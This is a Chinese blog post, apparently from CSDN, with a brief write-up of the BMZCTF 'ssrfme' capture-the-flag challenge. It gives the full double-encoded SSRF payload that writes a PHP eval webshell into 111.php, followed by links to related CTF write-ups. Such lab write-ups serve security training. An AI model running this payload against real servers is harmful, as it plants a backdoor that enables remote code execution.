BMZCTF ssrfme

最新推荐文章于 2024-06-18 10:22:08 发布
最新推荐文章于 2024-06-18 10:22:08 发布
阅读量588 收藏
点赞数 1
分类专栏: BMZCTF刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26243045/article/details/110186447
版权

考点:ssrf

打开题目发现程序会将$url中获取的数据保存在我们自定义的文件名中,而且$url必须是http://127.0.0.1/开头。

但是程序在执行成功后会把$path给返回一下,结合上述内容。这道题我们可以控制程序去获取返回结果页面的代码,然后保存到php文件中。返回的$path我们设置成一句话木马。

 

最终payload

http://www.bmzclub.cn:20001/?file=http://127.0.0.1/?file=http://127.0.0.1/index.php%26path=%253c%253fphp%2beval(%2524_POST%255b%2527shell%2527%255d)%253b%253f%253e&path=111.php

获得flag

白帽子社区
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BMZCTF hitcon_2017_ssrfme
qq_26243045的博客
11-26 622
考点:perl脚本open命令执行 打开题目显示如下代码 将GET请求到的数据保存在我们自定义的文件名当中。 给url参数传递/可以查看根目录下的内容 Perl的open函数执行会执行给open函数所传递的文件名参数中的系统命令,但是前提是这个文件名是需要存在的。 这道题因为文件名是可以控制的,所以就先生成一个以读取flag命令命名的文件 然后使用file协议去读取文件 访问即可获得flag ...
BMZCTFssrfme
末初的CSDN博客
01-24 1010
http://bmzclub.cn/challenges#ssrfme <?php if(isset($_GET) && !empty($_GET)){ $url = $_GET['file']; $path = "upload/".$_GET['path']; }else{ show_source(__FILE__); exit(); } if(strpos($path,'..') > -1){ die('This is
CTFHub技能树通关教程——SSRF漏洞原理攻击与防御(一)(超详细总结)
最新发布
xt350488的博客
06-18 541
即服务器端请求伪造(Server-Side Request Forgery),是一种网络攻击技术,攻击者利用服务器上的应用程序向任意服务器发起请求或者操作,这些请求可能包括但不限于文件读取、命令执行、端口扫描等。在向服务器发送请求时,首先浏览器会进行一次URL解码,其次服务器收到请求后,在执行curl功能时,进行第二次解码。码中的换行符,在URL的二次编码中不需要,否则会导致curl执行错误,导致我们拿不到正确的结果。替换完成之后,再次进行url编码,这里的url就是源码中的curl要执行的。
BMZCTF——web(hitcon_2017_ssrfme
LizePing_的博客
07-09 261
BMZCTF——webhitcon_2017_ssrfme解题思路法尔??解题思路 所有题目wp都经过实践。可放心食用。 hitcon_2017_ssrfme 解题思路 打开题目,看到下面代码,尝试了解所表达的意思。 定义一个变量sandbox,沙箱。路径则是在字符串orange加上所访问的ip地址,php使用$_SERVER[“REMOTE_ADDR”]获取访问IP地址(浏览器输入ip就能看到)。 可以先测试一波,url随便写,再加上条件文件名 构造payload:?url=1&filena
BMZCTF SSRFME 详解
u013797594的博客
07-04 814
BMZCTF ssrfme详解 题目: 打开题目直接是PHP代码,阅读代码:首先要求传入get参数file和path,file会直接赋值给$url,path会拼接upload,如果$path里面有…那么就会终止执行。$url如果以http://127.0.0.1/开头,则通过file_get_contents($url)读取内容,然后通过file_put_contents()写入到$path中,并且通过echo输出"console.log($path update successed!)" ,$path
BMZCTF:hitcon_2017_ssrfme
末初的CSDN博客
01-25 732
http://bmzclub.cn/challenges#hitcon_2017_ssrfme <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET["url"])); $info = pat
BMZCTF内存取证三项.zip
10-21
BMZCTF内存取证三项.zip》是一个与网络安全和取证相关的压缩文件,包含了一次可能的CTF(Capture The Flag)挑战。从标题和描述中,我们可以推测这是一场涉及解密、密码学以及文件分析的竞赛。接下来,我们将深入...
ctf逆向解题——re1-附件资源
03-02
ctf逆向解题——re1-附件资源
2020祥云杯 CTFNu1L.pdf
03-15
根据提供的文件内容,我们可以提炼出以下几个关键知识点: 1. RAR伪加密:这是一种常见的加密方法,它通过修改文件头的方式来欺骗解压缩软件,使其认为文件已经被加密。实际上文件并没有加密,只是通过改变文件头...
androidpn 消息推送 服务器端源码
08-10
《AndroidPN:构建高效的消息推送服务器》 在移动应用开发中,实时消息推送是一项至关重要的功能,它使得应用能够及时地向用户发送通知,提升用户体验。AndroidPN(Android Push Notification)是一个专门针对...
BMZCTF 山东省大学生网络技术大赛-baby
qq_26243045的博客
12-03 754
下载附件,是一个脚本文件: ``` # -*- coding: utf-8 -*- from Crypto.PublicKey import RSA import libnum import uuid flag = "flag{***************}" rsa = RSA.generate(4096,e=3) p = rsa.p d = rsa.d e = rsa.e N = rsa.n m = libnum.s2n(flag) c = pow(m, e, N..
BMZCTF Ook
qq_26243045的博客
12-03 422
下载附件,是一个文件文件,打开后都是OoK的编码, 打开https://www.splitbrain.org/services/ook,输入密文,选择Ook to text 就可以得到flag
BMZCTF(泰湖杯-MISC)
qq_46540840的博客
01-29 883
BMZCTF(泰湖杯-MISC)用到的方法1.zip伪加密2.docx文档文字的隐藏3.希尔密码加密4.Rabbit加密5.音频分析 用到的方法 1.zip伪加密 首先一个是加密的压缩包 一个是还处在带解密的doc文档。那么一种假设的线索就有了从doc文档中提取密码,来解压缩包。另一种假设是从压缩包解开来作为提取doc文档的密码.不过一般都是前者居多。 先从最外层开始最简单的就是zip的伪加密了 用 ZipCenOp.jar 一试便知 用法 java -jar ZipCenOp.jar r +需要解密的压缩
BMZCTF:533
末初的CSDN博客
01-22 422
http://bmzclub.cn/challenges#533 password000000000-999999999.zip 根据文件名提示,使用ARCHPR爆破password000000000-999999999.zip密码为9位数 压缩包密码为:548751269 得到533.zip 很明显可以直接通过CRC爆破文件内容,因为内容很小,但是这里1.txt是5字节的,2.txt和3.txt是3字节的,这个需要注意下,我们先把2.txt和3.txt的内容爆破出来,利用我的这篇文章中的三字节爆破
BMZCTF:oldmodem
末初的CSDN博客
12-21 703
http://bmzclub.cn/challenges#oldmodem 使用file命令查看下,发现是wav文件 但是修改后缀为wav后缀后并没有看出什么也没听出什么 然后根据题目名称得知这是modem文件,装个minimoden去识别这个文件 直接kali中:sudo apt-get install minimodem 这个题目原来还有个提示没给就是这个modem文件的标准是:Bell202 minimodem -r -f encoded 1200 GACTF{9621827f-a41b-
BMZCTF-端午彩蛋-纪念屈原
Crazy198410的博客
06-16 550
rar 下载附件,查看文件头部,是一个rar的压缩包。 改后缀解压,需要密码,看到压缩包提示:屈原的姓、氏、名、字分别为哪四个字?拼接起来md5加密后即为解压密码 查看百度:屈原(约公元前340—公元前278年),芈姓,屈氏,名平,字原, 组合芈屈平原,写脚本进行md5编码: import hashlib s1 = '芈屈平原'.encode('utf-8') x=hashlib.md5(s1).hexdigest() print(x) 得到密码:16ccb09f96f27af192f541992560
BMZCTF rcee
qq_26243045的博客
11-29 379
考点:代码审计、Shell命令 打开网页,可以看到源码 存在命令执行,但要求长度小于8。 首先寻找flag。先在根目录下寻找:输入`?command=ls /` 可以看到flag就在根目录下。 进行访问: 没有回显。因为空格被处理成`%20`,当成3个字符,要执行的命令长度超过8了。 使用`*`代替,输入:`?command=cat /f*` 可以看到,把f开关的所有文件内容都显示了出来。也可以看到flag ...
BMZCTF (持续更新)
zip471642048的博客
04-24 394
文章目录真正的CTFer 真正的CTFer 调整高度可以得到完整的图像大小
BMZCTF 真正的CTFer
m0_63253040的博客
03-10 653
下载CTFer.zip,里面还有个压缩包 压缩包里面只有一张图片 没有看见flag,我一般习惯先找属性,但是没有,再看010,也没看见特殊点,最后放到kali里的时候打开图片发现有crc错误,一般碰到这个是要改宽高,但是我还是用binwalk扫了下,发现没有什么 所以返回010去改,但是我发现只要一改宽,图片直接被损坏无法看,那就只改高把,最后是改到5000,16进制转换就是1388 这里因为我眼睛不好,真的真的看不见flag就在图片上 下次还是要仔细看图片 fl
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽子社区

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值